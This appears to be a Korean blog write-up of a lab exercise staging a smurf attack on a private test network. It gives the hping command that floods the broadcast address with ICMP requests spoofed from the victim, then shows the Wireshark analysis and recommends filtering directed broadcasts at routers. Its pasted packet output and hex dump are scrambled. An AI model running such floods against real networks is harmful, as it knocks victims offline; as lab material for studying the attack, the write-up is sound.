2020. 7. 14.

[Network] smurf 어택 실습


    1. 구성과 계획
    • 네트워크 구성도
    피해자  att7 - 192.168.10.150/00:0c:29:a1:3f:e0
    감시자 att6 - 192.168.10.149/00:0C:29:C6:9A:42
    공격자 att5 - 192.168.10.148/00:0C:29:5D:87:05

    • 과정 정리
    step1. att6 tcpdump 캡쳐
    step2. att5 hping 공격 실행
    step3. wireshark 캡쳐본 분석

    1. 관련내용정리
    smurf atack : icmp request 패킷을 시스템이 매우 많은 네트워크로 브로드캐스트하여 피해자 PC 증폭시켜 공격하는 기법이다.

    1. 실습과정
    step1. att6 tcpdump 캡쳐
    tcpdump -xX -w smurf.cap -i eth0
    step2. att5 hping 공격 실행
    hping 192.168.10.255 -a 192.168.10.150 --icmp --flood
    step4. wireshark 캡쳐본 분석
    wireshark on
    • filtering : ip.addr == 192.168.10.150
    192. 168.10. 150 
192. 168.10. 255 
192. 168.10. 150 
192. 168.10. 255 
192. 168.10. 150 
192. 168.10. 255 
192. 168.10. 155 
192. 168.10. 150 
192. 168.10. 153 
192. 168.10. 150 
192. 168.10. 150 
192. 168.10. 255 
192. 168.10. 150 
192. 168.10. 255 
192. 168.10. 150 
192. 168.10. 255 
192. 168.10. 150 
192. 168.10. 255 
192. 168.10. 155 
192. 168.10. 150 
192. 168.10. 153 
192. 168.10. 150 
ICMP 
ICMP 
ICMP 
ICMP 
ICMP 
ICMP 
ICMP 
ICMP 
ICMP 
ICMP 
ICMP 
60 
60 
60 
60 
60 
60 
60 
60 
60 
60 
60 
Echo 
Echo 
Echo 
Echo 
Echo 
Echo 
Echo 
Echo 
Echo 
Echo 
Echo 
(ping) 
(ping) 
(ping) 
(ping) 
(ping) 
(ping) 
(ping) 
(ping) 
(ping) 
(ping) 
(ping) 
request 
request 
request 
reply 
reply 
request 
request 
request 
request 
reply 
reply 
id=0xde14, 
id=0xde14, 
id=0xde14, 
id=0xde14, 
id=0xde14, 
id=0xde14, 
id=0xde14, 
id=0xde14, 
id=0xde14, 
id=0xde14, 
id=0xde14, 
seq=768/3, tt1=64 
seq=1024/4, tt1= 
seq=1280/5, tt1= 
seq=0/0, tt1=64 
seq=0/0, tt1=64 
seq= 
seq= 
seq= 
seq= 
seq= 
seq= 
1536/6, 
1792/7, 
2048/8, 
2304/9, 
256/1, 
256/1, 
tt1= 
tt1= 
tt1= 
tt1= 
tt1=64 
tt1=64
    브로드캐스트 함으로써 모든 네트워크에 있는 호스트가 150번에 reply 패킷을 보내게 된다.
    request 보낸 패킷을 확인하면 공격자의 MAC 주소가 들어있다. 아래는 request 패킷중 하나이다.
    87 
00 
df ΟΟ 
40 01 
ff 08 
000000 0000000000 
οο οο οο οο 
00 
00 
14 
14 
29 
37 
05 
05 
08 
00 
96 
45 
οο 
28 
7
    공격자의 MAC 주소인 00:0c:29:5d:87:05으로 되어있다.

    1. 결론
    해당 네트워크에 모든 호스트가 reply하기 때문에 적은양으로도 피해를 있다. 라우터에서 외부에서 들어오는 패킷이 브로드캐스트하는 것을 필터링해줘야한다.


댓글 없음:

댓글 쓰기